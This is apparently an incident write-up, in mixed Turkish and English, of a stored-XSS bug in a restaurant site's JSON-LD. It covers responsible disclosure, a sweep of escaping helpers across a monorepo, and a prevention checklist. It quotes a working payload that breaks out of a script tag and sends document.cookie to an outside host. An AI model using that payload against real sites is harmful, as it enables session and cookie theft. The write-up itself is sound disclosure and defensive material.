Gaziantep Sahinbey de 32 yaslarinda freelance SEO consultant + part-time bug bounty hunter Cansu (@cansubits), 4-nesil baklavaci client i icin SEO audit. Chrome DevTools Console + Network acik. thmenu.com/tr/discover/<baklavaci_slug> a navigate. Console: **Uncaught SyntaxError: Unexpected token "<"**. JSON-LD bozulmus. View Source: <script type="application/ld+json"> icinde kacirilmamis & + < karakterleri. "HTML escape yok mu? Stored-XSS sink olabilir." Kendi thMenu Pro test account a yeni Test Restaurant ekledi, Description alanina: `Lorem ipsum </script><script>fetch("//cansubits.com/xss?c="+document.cookie)</script> dolor sit amet.` Save + 5-10dk edge cache wait + thmenu.com/tr/discover/test-restaurant navigate. Browser cansubits.com/xss?c=... endpoint ine call yapti — **document.cookie exfiltrate edildi**. Stored-XSS confirmed. Cansu responsible disclosure security@thmenu.com. Engineering forensik: helper var miydi? Evet — apps/web-menu/src/lib/sanitize.ts:escapeJsonForScriptTag() PR #565 batch TT F1 ile shipped. < / > / & / U+2028 / U+2029 karakterlerini \uXXXX JSON-escape formuna cevirir; web-menu app inde 11 yerde wrapped. Web-landing de neden kullanilmiyor? grep -rn "dangerouslySetInnerHTML.*JSON.stringify" apps/web-landing → 8 result (discover, blog, vs, authors, faq, help, layout, synaltix). Hepsi raw JSON.stringify, escapeJsonForScriptTag yok. Helper sweep eksikti. PR #565 sadece web-menu ye uygulanmis (cunku web-menu CSP nonce-... kullaniyordu, web-landing "unsafe-inline" SEO crawler compatibility icin — yani web-landing de CSP-level defense yok, escape helper MANDATORY). **PR #635 batch III F1** 2-katmanli fix: **Layer 1 yeni helper file**: apps/web-landing/src/lib/sanitize.ts mirror of web-menu helper; U+2028/U+2029 regex pattern leri \uXXXX form unda yazildi (TS parser source-line literal yarida kestigi icin). **Layer 2 8 JSON-LD render site i wrap**: dangerouslySetInnerHTML={{ __html: escapeJsonForScriptTag(JSON.stringify(schema)) }} per site. Deploy ayni gun. Cansu nun PoC payload i yeniden test — </script><script>fetch(...)</script> artik </script></script> olarak escape; browser script-tag breakout impossible. Pre-fix 90-day edge cache + Workers Analytics audit: document.cookie / </script><script> / fetch(cross-origin) / eval grep — **0 prior exploits**. Cansu ilkti, responsibly disclosed. **Critical severity + €750 Wise transfer + Hall of Fame + 1-year unlimited Pro tier**. Hannah Berlin Mitte version unda ayni flow Berlin bakery client SEO audit ile. Pattern: **defense-in-depth helper lari (escape, sanitize, normalize) bir app te shipped olduktan sonra monorepo daki diger app lere sweep gereklidir. Helper olmayan app ler beklenmedik attack surface olusturur — ozellikle CSP tek-noktada-savunma kontrolu o app te aktif degilse.** Implementation checklist: (1) yeni helper PR i land ettiginde monorepo daki TUM app lere sweep; (2) helper i packages/shared-types e koy single source of truth; (3) CSP profile farkli app ler icin farkliysa daha gevsek CSP li app ler helper i MANDATORY gormeli; (4) ESLint rule dangerouslySetInnerHTML.*JSON.stringify pattern lint warning; (5) quarterly grep audit; (6) penetration test coverage every public CDN-served page XSS payload ile test.